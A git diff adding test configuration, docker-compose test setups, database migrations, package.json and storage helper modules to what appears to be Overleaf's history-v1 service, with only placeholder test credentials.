+        "projectId": "fake"
+      }
+    }
+  },
+  "blobStore": {
+    "globalBucket": "overleaf-test-blobs",
+    "projectBucket": "overleaf-test-project-blobs"
+  },
+  "chunkStore": {
+    "bucket": "overleaf-test-chunks"
+  },
+  "zipStore": {
+    "bucket": "overleaf-test-zips"
+  },
+  "backupStore": {
+    "chunksBucket": "overleaf-test-history-chunks",
+    "deksBucket": "overleaf-test-history-deks",
+    "globalBlobsBucket": "overleaf-test-history-global-blobs",
+    "projectBlobsBucket": "overleaf-test-history-project-blobs"
+  },
+  "backupPersistor": {
+    "keyEncryptionKeys": "[{\"key\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\"salt\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\"}]",
+    "s3SSEC": {
+      "ca": "[\"/certs/public.crt\"]"
+    },
+    "tieringStorageClass": "REDUCED_REDUNDANCY"
+  },
+  "healthCheckBlobs": "[\"42/f70d7bba4ae1f07682e0358bd7a2068094fc023b\",\"000000000000000000000042/98d5521fe746bc2d11761edab5d0829bee286009\"]",
+  "healthCheckProjects": "[\"42\",\"000000000000000000000042\"]",
+  "backupRPOInMS": "360000",
+  "maxDeleteKeys": "3",
+  "useDeleteObjects": "false",
+  "mongo": {
+    "uri": "mongodb://mongo:27017/sharelatex"
+  },
+  "basicHttpAuth": {
+    "password": "test"
+  },
+  "jwtAuth": {
+    "key": "testtest",
+    "algorithm": "HS256"
+  },
+  "maxFileUploadSize": "524288"
+}
diff --git a/services/history-v1/docker-compose.ci.yml b/services/history-v1/docker-compose.ci.yml
new file mode 100644
index 0000000..06d5d55
--- /dev/null
+++ b/services/history-v1/docker-compose.ci.yml
@@ -0,0 +1,237 @@
+# This file was auto-generated, do not edit it directly.
+# Instead run bin/update_build_scripts from
+# https://github.com/overleaf/internal/
+
+version: "2.3"
+
+services:
+  test_unit:
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    user: node
+    command: npm run test:unit:_run
+    environment:
+      NODE_ENV: test
+      NODE_OPTIONS: "--unhandled-rejections=strict"
+
+
+  test_acceptance:
+    build: .
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    environment:
+      ELASTIC_SEARCH_DSN: es:9200
+      REDIS_HOST: redis
+      QUEUES_REDIS_HOST: redis
+      HISTORY_REDIS_HOST: redis
+      ANALYTICS_QUEUES_REDIS_HOST: redis
+      MONGO_HOST: mongo
+      POSTGRES_HOST: postgres
+      AWS_S3_ENDPOINT: https://minio:9000
+      AWS_S3_PATH_STYLE: 'true'
+      AWS_ACCESS_KEY_ID: OVERLEAF_HISTORY_S3_ACCESS_KEY_ID
+      AWS_SECRET_ACCESS_KEY: OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY
+      MINIO_ROOT_USER: MINIO_ROOT_USER
+      MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD
+      GCS_API_ENDPOINT: http://gcs:9090
+      GCS_PROJECT_ID: fake
+      STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1
+      MOCHA_GREP: ${MOCHA_GREP}
+      NODE_ENV: test
+      NODE_OPTIONS: "--unhandled-rejections=strict"
+    volumes:
+      - ./test/acceptance/certs:/certs
+    depends_on:
+      mongo:
+        condition: service_started
+      redis:
+        condition: service_healthy
+      postgres:
+        condition: service_healthy
+      certs:
+        condition: service_completed_successfully
+      minio:
+        condition: service_started
+      minio_setup:
+        condition: service_completed_successfully
+      gcs:
+        condition: service_healthy
+    user: node
+    command: npm run test:acceptance
+
+
+  tar:
+    build: .
+    image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER
+    volumes:
+      - ./:/tmp/build/
+    command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs .
+    user: root
+  redis:
+    image: redis
+    healthcheck:
+      test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ]
+      interval: 1s
+      retries: 20
+
+  mongo:
+    image: mongo:6.0.13
+    command: --replSet overleaf
+    volumes:
+      - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js
+    environment:
+      MONGO_INITDB_DATABASE: sharelatex
+    extra_hosts:
+      # Required when using the automatic database setup for initializing the
+      # replica set. This override is not needed when running the setup after
+      # starting up mongo.
+      - mongo:127.0.0.1
+  postgres:
+    image: postgres:10
+    environment:
+      POSTGRES_USER: overleaf
+      POSTGRES_PASSWORD: overleaf
+      POSTGRES_DB: overleaf-history-v1-test
+    volumes:
+      - ./test/acceptance/pg-init/:/docker-entrypoint-initdb.d/
+    healthcheck:
+      test: pg_isready --quiet
+      interval: 1s
+      retries: 20
+
+  certs:
+    image: node:20.18.2
+    volumes:
+      - ./test/acceptance/certs:/certs
+    working_dir: /certs
+    entrypoint: sh
+    command:
+      - '-cex'
+      - |
+        if [ ! -f ./certgen ]; then
+          wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)"
+          chmod +x ./certgen
+        fi
+        if [ ! -f private.key ] || [ ! -f public.crt ]; then
+          ./certgen -host minio
+        fi
+
+  minio:
+    image: minio/minio:RELEASE.2024-10-13T13-34-11Z
+    command: server /data
+    volumes:
+      - ./test/acceptance/certs:/root/.minio/certs
+    environment:
+      MINIO_ROOT_USER: MINIO_ROOT_USER
+      MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD
+    depends_on:
+      certs:
+        condition: service_completed_successfully
+
+  minio_setup:
+    depends_on:
+      certs:
+        condition: service_completed_successfully
+      minio:
+        condition: service_started
+    image: minio/mc:RELEASE.2024-10-08T09-37-26Z
+    volumes:
+      - ./test/acceptance/certs:/root/.mc/certs/CAs
+    entrypoint: sh
+    command:
+      - '-cex'
+      - |
+        sleep 1
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD
+        mc mb --ignore-existing s3/overleaf-test-history-chunks
+        mc mb --ignore-existing s3/overleaf-test-history-deks
+        mc mb --ignore-existing s3/overleaf-test-history-global-blobs
+        mc mb --ignore-existing s3/overleaf-test-history-project-blobs
+        mc admin user add s3 \
+          OVERLEAF_HISTORY_S3_ACCESS_KEY_ID \
+          OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY
+        echo '
+        {
+          "Version": "2012-10-17",
+          "Statement": [
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-chunks"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-chunks/*"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-deks"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-deks/*"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
"s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs/*" + } + ] + }' > policy-history.json + + mc admin policy create s3 overleaf-history policy-history.json + mc admin policy attach s3 overleaf-history \ + --user=OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/history-v1/docker-compose.yml b/services/history-v1/docker-compose.yml new file mode 100644 index 0000000..f4c885d --- /dev/null +++ b/services/history-v1/docker-compose.yml @@ -0,0 +1,246 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. + dockerfile: services/history-v1/Dockerfile + target: base + volumes: + - .:/overleaf/services/history-v1 + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/history-v1 + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + build: + context: ../.. + dockerfile: services/history-v1/Dockerfile + target: base + volumes: + - .:/overleaf/services/history-v1 + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + - ./test/acceptance/certs:/certs + working_dir: /overleaf/services/history-v1 + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_HISTORY_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + postgres: + condition: service_healthy + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. 
+      # replica set. This override is not needed when running the setup after
+      # starting up mongo.
+      - mongo:127.0.0.1
+
+  postgres:
+    image: postgres:10
+    environment:
+      POSTGRES_USER: overleaf
+      POSTGRES_PASSWORD: overleaf
+      POSTGRES_DB: overleaf-history-v1-test
+    volumes:
+      - ./test/acceptance/pg-init/:/docker-entrypoint-initdb.d/
+    healthcheck:
+      test: pg_isready --host=localhost --quiet
+      interval: 1s
+      retries: 20
+
+  certs:
+    image: node:20.18.2
+    volumes:
+      - ./test/acceptance/certs:/certs
+    working_dir: /certs
+    entrypoint: sh
+    command:
+      - '-cex'
+      - |
+        if [ ! -f ./certgen ]; then
+          wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)"
+          chmod +x ./certgen
+        fi
+        if [ ! -f private.key ] || [ ! -f public.crt ]; then
+          ./certgen -host minio
+        fi
+
+  minio:
+    image: minio/minio:RELEASE.2024-10-13T13-34-11Z
+    command: server /data
+    volumes:
+      - ./test/acceptance/certs:/root/.minio/certs
+    environment:
+      MINIO_ROOT_USER: MINIO_ROOT_USER
+      MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD
+    depends_on:
+      certs:
+        condition: service_completed_successfully
+
+  minio_setup:
+    depends_on:
+      certs:
+        condition: service_completed_successfully
+      minio:
+        condition: service_started
+    image: minio/mc:RELEASE.2024-10-08T09-37-26Z
+    volumes:
+      - ./test/acceptance/certs:/root/.mc/certs/CAs
+    entrypoint: sh
+    command:
+      - '-cex'
+      - |
+        sleep 1
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \
+        || sleep 3 && \
+        mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD
+        mc mb --ignore-existing s3/overleaf-test-history-chunks
+        mc mb --ignore-existing s3/overleaf-test-history-deks
+        mc mb --ignore-existing s3/overleaf-test-history-global-blobs
+        mc mb --ignore-existing s3/overleaf-test-history-project-blobs
+        mc admin user add s3 \
+          OVERLEAF_HISTORY_S3_ACCESS_KEY_ID \
+          OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY
+        echo '
+        {
+          "Version": "2012-10-17",
+          "Statement": [
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-chunks"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-chunks/*"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-deks"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-deks/*"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-global-blobs/*"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:ListBucket"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs"
+            },
+            {
+              "Effect": "Allow",
+              "Action": [
+                "s3:PutObject",
+                "s3:GetObject",
+                "s3:DeleteObject"
+              ],
+              "Resource": "arn:aws:s3:::overleaf-test-history-project-blobs/*"
+            }
+          ]
+        }' > policy-history.json
+
+        mc admin policy create s3 overleaf-history policy-history.json
+        mc admin policy attach s3 overleaf-history \
+          --user=OVERLEAF_HISTORY_S3_ACCESS_KEY_ID
+  gcs:
+    image: fsouza/fake-gcs-server:1.45.2
+    command: ["--port=9090", "--scheme=http"]
+    healthcheck:
+      test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b
+      interval: 1s
+      retries: 20
diff --git a/services/history-v1/install_deps.sh b/services/history-v1/install_deps.sh
new file mode 100755
index 0000000..4ce7223
--- /dev/null
+++ b/services/history-v1/install_deps.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+set -ex
+
+apt-get update
+
+apt-get install jq parallel --yes
+
+rm -rf /var/lib/apt/lists/*
diff --git a/services/history-v1/knexfile.js b/services/history-v1/knexfile.js
new file mode 100644
index 0000000..6bdf877
--- /dev/null
+++ b/services/history-v1/knexfile.js
@@ -0,0 +1,19 @@
+const config = require('config')
+
+const baseConfig = {
+  client: 'postgresql',
+  connection: config.herokuDatabaseUrl || config.databaseUrl,
+  pool: {
+    min: parseInt(config.databasePoolMin, 10),
+    max: parseInt(config.databasePoolMax, 10),
+  },
+  migrations: {
+    tableName: 'knex_migrations',
+  },
+}
+
+module.exports = {
+  development: baseConfig,
+  production: baseConfig,
+  test: baseConfig,
+}
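Note: knexfile.js serves both the app and the migration runner (`npm run migrate` maps to `knex migrate:latest` in package.json below). A hedged sketch of how a hypothetical one-off script could obtain a client with the same settings; all three environments share the identical baseConfig:

// Hypothetical one-off script run from services/history-v1
const environments = require('./knexfile')
const knex = require('knex')(environments[process.env.NODE_ENV || 'development'])

async function main() {
  // `chunks` is created by the initial migration below
  const rows = await knex('chunks').count('id')
  console.log(rows)
  await knex.destroy()
}

main().catch(console.error)
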
diff --git a/services/history-v1/migrations/20220228163642_initial.js b/services/history-v1/migrations/20220228163642_initial.js
new file mode 100644
index 0000000..560dd22
--- /dev/null
+++ b/services/history-v1/migrations/20220228163642_initial.js
@@ -0,0 +1,80 @@
+/**
+ * This is the initial migration, meant to replicate the current state of the
+ * history database. If tables already exist, this migration is a noop.
+ */
+
+exports.up = async function (knex) {
+  await knex.raw(`
+    CREATE TABLE IF NOT EXISTS chunks (
+      id SERIAL,
+      doc_id integer NOT NULL,
+      end_version integer NOT NULL,
+      end_timestamp timestamp without time zone,
+      CONSTRAINT chunks_version_non_negative CHECK (end_version >= 0)
+    )
+  `)
+  await knex.raw(`
+    CREATE UNIQUE INDEX IF NOT EXISTS index_chunks_on_doc_id_and_end_version
+    ON chunks (doc_id, end_version)
+  `)
+
+  await knex.raw(`
+    CREATE TABLE IF NOT EXISTS old_chunks (
+      chunk_id integer NOT NULL PRIMARY KEY,
+      doc_id integer NOT NULL,
+      end_version integer,
+      end_timestamp timestamp without time zone,
+      deleted_at timestamp without time zone
+    )
+  `)
+  await knex.raw(`
+    CREATE INDEX IF NOT EXISTS index_old_chunks_on_doc_id_and_end_version
+    ON old_chunks (doc_id, end_version)
+  `)
+
+  await knex.raw(`
+    CREATE TABLE IF NOT EXISTS pending_chunks (
+      id SERIAL,
+      doc_id integer NOT NULL,
+      end_version integer NOT NULL,
+      end_timestamp timestamp without time zone,
+      CONSTRAINT chunks_version_non_negative CHECK (end_version >= 0)
+    )
+  `)
+  await knex.raw(`
+    CREATE INDEX IF NOT EXISTS index_pending_chunks_on_doc_id_and_id
+    ON pending_chunks (doc_id, id)
+  `)
+
+  await knex.raw(`
+    CREATE TABLE IF NOT EXISTS blobs (
+      hash_bytes bytea NOT NULL PRIMARY KEY,
+      byte_length integer NOT NULL,
+      string_length integer,
+      global boolean,
+      CONSTRAINT blobs_byte_length_non_negative CHECK (byte_length >= 0),
+      CONSTRAINT blobs_string_length_non_negative
+        CHECK (string_length IS NULL OR string_length >= 0)
+    )
+  `)
+
+  await knex.raw(`
+    CREATE TABLE IF NOT EXISTS project_blobs (
+      project_id integer NOT NULL,
+      hash_bytes bytea NOT NULL,
+      byte_length integer NOT NULL,
+      string_length integer,
+      PRIMARY KEY (project_id, hash_bytes),
+      CONSTRAINT project_blobs_byte_length_non_negative
+        CHECK (byte_length >= 0),
+      CONSTRAINT project_blobs_string_length_non_negative
+        CHECK (string_length IS NULL OR string_length >= 0)
+    )
+  `)
+
+  await knex.raw(`CREATE SEQUENCE IF NOT EXISTS docs_id_seq`)
+}
+
+exports.down = async function (knex) {
+  // Don't do anything on the down migration
+}
diff --git a/services/history-v1/migrations/20221026201437_chunk_start_version.js b/services/history-v1/migrations/20221026201437_chunk_start_version.js
new file mode 100644
index 0000000..4aed9bc
--- /dev/null
+++ b/services/history-v1/migrations/20221026201437_chunk_start_version.js
@@ -0,0 +1,23 @@
+exports.up = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks ADD COLUMN start_version integer
+  `)
+  await knex.raw(`
+    ALTER TABLE pending_chunks ADD COLUMN start_version integer
+  `)
+  await knex.raw(`
+    ALTER TABLE old_chunks ADD COLUMN start_version integer
+  `)
+}
+
+exports.down = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks DROP COLUMN start_version
+  `)
+  await knex.raw(`
+    ALTER TABLE pending_chunks DROP COLUMN start_version
+  `)
+  await knex.raw(`
+    ALTER TABLE old_chunks DROP COLUMN start_version
+  `)
+}
diff --git a/services/history-v1/migrations/20221027201324_unique_start_version.js b/services/history-v1/migrations/20221027201324_unique_start_version.js
new file mode 100644
index 0000000..2d7885e
--- /dev/null
+++ b/services/history-v1/migrations/20221027201324_unique_start_version.js
@@ -0,0 +1,41 @@
+exports.config = {
+  // CREATE INDEX CONCURRENTLY can't be run inside a transaction
+  // If this migration fails in the middle, indexes and constraints will have
+  // to be cleaned up manually.
+  transaction: false,
+}
+
+exports.up = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks
+    ADD CONSTRAINT chunks_start_version_non_negative
+    CHECK (start_version IS NOT NULL AND start_version >= 0)
+    NOT VALID
+  `)
+  await knex.raw(`
+    ALTER TABLE chunks
+    VALIDATE CONSTRAINT chunks_start_version_non_negative
+  `)
+  await knex.raw(`
+    CREATE UNIQUE INDEX CONCURRENTLY index_chunks_on_doc_id_and_start_version
+    ON chunks (doc_id, start_version)
+  `)
+  await knex.raw(`
+    ALTER TABLE chunks
+    ADD UNIQUE USING INDEX index_chunks_on_doc_id_and_start_version
+  `)
+}
+
+exports.down = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks
+    DROP CONSTRAINT IF EXISTS index_chunks_on_doc_id_and_start_version
+  `)
+  await knex.raw(`
+    DROP INDEX IF EXISTS index_chunks_on_doc_id_and_start_version
+  `)
+  await knex.raw(`
+    ALTER TABLE chunks
+    DROP CONSTRAINT IF EXISTS chunks_start_version_non_negative
+  `)
+}
diff --git a/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js b/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js
new file mode 100644
index 0000000..eb76dff
--- /dev/null
+++ b/services/history-v1/migrations/20221118213808_delete_global_blobs_table.js
@@ -0,0 +1,7 @@
+exports.up = async function (knex) {
+  await knex.raw(`DROP TABLE IF EXISTS blobs`)
+}
+
+exports.down = function (knex) {
+  // Not reversible
+}
diff --git a/services/history-v1/migrations/20250415210802_add_chunks_closed.js b/services/history-v1/migrations/20250415210802_add_chunks_closed.js
new file mode 100644
index 0000000..b5c1d57
--- /dev/null
+++ b/services/history-v1/migrations/20250415210802_add_chunks_closed.js
@@ -0,0 +1,27 @@
+// @ts-check
+
+/**
+ * @import { Knex } from "knex"
+ */
+
+/**
+ * @param { Knex } knex
+ * @returns { Promise<void> }
+ */
+exports.up = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks
+    ADD COLUMN closed BOOLEAN NOT NULL DEFAULT FALSE
+  `)
+}
+
+/**
+ * @param { Knex } knex
+ * @returns { Promise<void> }
+ */
+exports.down = async function (knex) {
+  await knex.raw(`
+    ALTER TABLE chunks
+    DROP COLUMN closed
+  `)
+}
diff --git a/services/history-v1/package.json b/services/history-v1/package.json
new file mode 100644
index 0000000..3219be9
--- /dev/null
+++ b/services/history-v1/package.json
@@ -0,0 +1,76 @@
+{
+  "name": "overleaf-editor",
+  "version": "1.0.0",
+  "description": "Overleaf Editor.",
+  "author": "",
+  "license": "Proprietary",
+  "private": true,
+  "dependencies": {
+    "@google-cloud/secret-manager": "^5.6.0",
+    "@overleaf/logger": "*",
+    "@overleaf/metrics": "*",
+    "@overleaf/mongo-utils": "*",
+    "@overleaf/o-error": "*",
+    "@overleaf/object-persistor": "*",
+    "@overleaf/promise-utils": "*",
+    "@overleaf/redis-wrapper": "*",
+    "@overleaf/settings": "*",
+    "@overleaf/stream-utils": "^0.1.0",
+    "archiver": "^5.3.0",
+    "basic-auth": "^2.0.1",
+    "bluebird": "^3.7.2",
+    "body-parser": "^1.20.3",
+    "bull": "^4.16.5",
+    "bunyan": "^1.8.12",
+    "check-types": "^11.1.2",
+    "command-line-args": "^3.0.3",
+    "config": "^1.19.0",
+    "express": "^4.21.2",
+    "fs-extra": "^9.0.1",
+    "generic-pool": "^2.1.1",
+    "helmet": "^3.22.0",
+    "http-status": "^1.4.2",
+    "jsonwebtoken": "^9.0.0",
+    "knex": "^2.4.0",
+    "lodash": "^4.17.19",
+    "mongodb": "6.12.0",
+    "overleaf-editor-core": "*",
+    "p-limit": "^6.2.0",
+    "pg": "^8.7.1",
+    "pg-query-stream": "^4.2.4",
+    "swagger-tools": "^0.10.4",
+    "temp": "^0.8.3",
+    "throng": "^4.0.0",
+    "tsscmp": "^1.0.6",
+    "utf-8-validate": "^5.0.4"
+  },
+  "devDependencies": {
+    "benny": "^3.7.1",
+    "chai": "^4.3.6",
+    "chai-as-promised": "^7.1.1",
+    "chai-exclude": "^2.1.1",
+    "mocha": "^11.1.0",
+    "node-fetch": "^2.7.0",
+    "sinon": "^9.0.2",
+    "swagger-client": "^3.10.0",
+    "typescript": "^5.0.4",
+    "yauzl": "^2.9.1"
+  },
+  "scripts": {
+    "start": "node app.js",
+    "lint": "eslint --max-warnings 0 --format unix .",
+    "lint:fix": "eslint --fix .",
+    "format": "prettier --list-different $PWD/'**/*.*js'",
+    "format:fix": "prettier --write $PWD/'**/*.*js'",
+    "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP",
+    "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP",
+    "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js",
+    "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js",
+    "nodemon": "node --watch app.js",
+    "migrate": "knex migrate:latest",
+    "delete_old_chunks": "node storage/tasks/delete_old_chunks.js",
+    "fix_duplicate_versions": "node storage/tasks/fix_duplicate_versions.js",
+    "benchmarks": "node benchmarks/index.js",
+    "types:check": "tsc --noEmit"
+  }
+}
diff --git a/services/history-v1/storage/index.js b/services/history-v1/storage/index.js
new file mode 100644
index 0000000..5fe283a
--- /dev/null
+++ b/services/history-v1/storage/index.js
@@ -0,0 +1,25 @@
+exports.BatchBlobStore = require('./lib/batch_blob_store')
+exports.blobHash = require('./lib/blob_hash')
+exports.HashCheckBlobStore = require('./lib/hash_check_blob_store')
+exports.chunkBuffer = require('./lib/chunk_buffer')
+exports.chunkStore = require('./lib/chunk_store')
+exports.historyStore = require('./lib/history_store').historyStore
+exports.knex = require('./lib/knex')
+exports.mongodb = require('./lib/mongodb')
+exports.redis = require('./lib/redis')
+exports.persistChanges = require('./lib/persist_changes')
+exports.persistor = require('./lib/persistor')
+exports.ProjectArchive = require('./lib/project_archive')
+exports.streams = require('./lib/streams')
+exports.temp = require('./lib/temp')
+exports.zipStore = require('./lib/zip_store')
+
+const { BlobStore, loadGlobalBlobs } = require('./lib/blob_store')
+exports.BlobStore = BlobStore
+exports.loadGlobalBlobs = loadGlobalBlobs
+
+const { InvalidChangeError } = require('./lib/errors')
+exports.InvalidChangeError = InvalidChangeError
+
+const { ChunkVersionConflictError } = require('./lib/chunk_store/errors')
+exports.ChunkVersionConflictError = ChunkVersionConflictError
diff --git a/services/history-v1/storage/lib/assert.js b/services/history-v1/storage/lib/assert.js
new file mode 100644
index 0000000..91f24da
--- /dev/null
+++ b/services/history-v1/storage/lib/assert.js
@@ -0,0 +1,76 @@
+'use strict'
+
+const OError = require('@overleaf/o-error')
+
+const check = require('check-types')
+const { Blob } = require('overleaf-editor-core')
+
+const assert = check.assert
+
+const MONGO_ID_REGEXP = /^[0-9a-f]{24}$/
+const POSTGRES_ID_REGEXP = /^[1-9][0-9]{0,9}$/
+const MONGO_OR_POSTGRES_ID_REGEXP = /^([0-9a-f]{24}|[1-9][0-9]{0,9})$/
+
+function transaction(transaction, message) {
+  assert.function(transaction, message)
+}
+
+function blobHash(arg, message) {
+  try {
+    assert.match(arg, Blob.HEX_HASH_RX, message)
+  } catch (error) {
+    throw OError.tag(error, message, { arg })
+  }
+}
+
+/**
+ * A project id is a string that contains either an integer (for projects stored in Postgres) or 24
+ * hex digits (for projects stored in Mongo)
+ */
+function projectId(arg, message) {
+  try {
+    assert.match(arg, MONGO_OR_POSTGRES_ID_REGEXP, message)
+  } catch (error) {
+    throw OError.tag(error, message, { arg })
+  }
+}
+
+/**
+ * A chunk id is a string that contains either an integer (for projects stored in Postgres) or 24
+ * hex digits (for projects stored in Mongo)
+ */
+function chunkId(arg, message) {
+  try {
+    assert.match(arg, MONGO_OR_POSTGRES_ID_REGEXP, message)
+  } catch (error) {
+    throw OError.tag(error, message, { arg })
+  }
+}
+
+function mongoId(arg, message) {
+  try {
+    assert.match(arg, MONGO_ID_REGEXP, message)
+  } catch (error) {
+    throw OError.tag(error, message, { arg })
+  }
+}
+
+function postgresId(arg, message) {
+  try {
+    assert.match(arg, POSTGRES_ID_REGEXP, message)
+  } catch (error) {
+    throw OError.tag(error, message, { arg })
+  }
+}
+
+module.exports = {
+  ...assert,
+  transaction,
+  blobHash,
+  projectId,
+  chunkId,
+  mongoId,
+  postgresId,
+  MONGO_ID_REGEXP,
+  POSTGRES_ID_REGEXP,
+}
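Note: assert.js encodes the service's two ID namespaces: Mongo IDs are 24 hex characters, Postgres IDs are positive integer strings, and project/chunk IDs accept either. A small sketch of the intended semantics (the IDs are placeholders):

const assert = require('./storage/lib/assert')

assert.projectId('000000000000000000000042', 'expected a project id') // ok
assert.projectId('42', 'expected a project id') // ok (postgres form)
assert.mongoId('42', 'expected a mongo id') // throws a tagged OError
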
